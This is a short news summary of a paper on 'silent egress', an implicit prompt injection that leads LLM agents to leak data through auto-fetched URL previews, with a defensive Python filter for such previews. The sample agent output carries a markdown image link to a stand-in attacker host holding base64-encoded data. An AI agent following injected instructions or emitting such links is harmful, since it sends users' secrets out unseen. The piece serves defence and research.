AIBearish · arXiv CS AI · Feb 27
Silent Egress: When Implicit Prompt Injection Makes LLM Agents Leak Without a Trace
Researchers have identified a vulnerability dubbed 'silent egress', in which an implicit prompt injection tricks LLM agents into exfiltrating sensitive data through malicious URL previews, leaving no visible trace. In tests, the attack succeeded 89% of the time, and 95% of those successful attacks bypassed standard safety checks.
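The exfiltration channel described, secrets smuggled out through auto-fetched URL previews, can be illustrated with a minimal output filter. This is a hypothetical sketch, not the paper's defense: the allowlist, hostnames, and markdown-image heuristic are all assumptions for illustration.

```python
import re
from urllib.parse import urlparse

# Hypothetical allowlist of hosts whose previews we trust to render.
ALLOWED_HOSTS = {"example.com", "docs.example.com"}

# Matches markdown image syntax, whose URL many clients fetch automatically
# (no user click), making it a silent exfiltration channel.
MD_IMAGE = re.compile(r"!\[[^\]]*\]\(([^)\s]+)\)")

def strip_unsafe_previews(text: str) -> str:
    """Replace markdown image previews pointing at non-allowlisted hosts.

    Any secret the injected instructions embed in the URL (path or query
    string) would otherwise leave the moment the preview is rendered.
    """
    def repl(match: re.Match) -> str:
        host = urlparse(match.group(1)).hostname or ""
        return match.group(0) if host in ALLOWED_HOSTS else "[preview removed]"
    return MD_IMAGE.sub(repl, text)

# A compromised page might steer the agent into emitting output like this,
# where the query parameter carries base64-encoded conversation data:
agent_output = "Summary done. ![status](https://attacker.test/px?d=c2VjcmV0)"
print(strip_unsafe_previews(agent_output))
```

An allowlist on the rendering side is only one layer; the summary's 95% bypass rate suggests such output-side checks alone are unlikely to be sufficient.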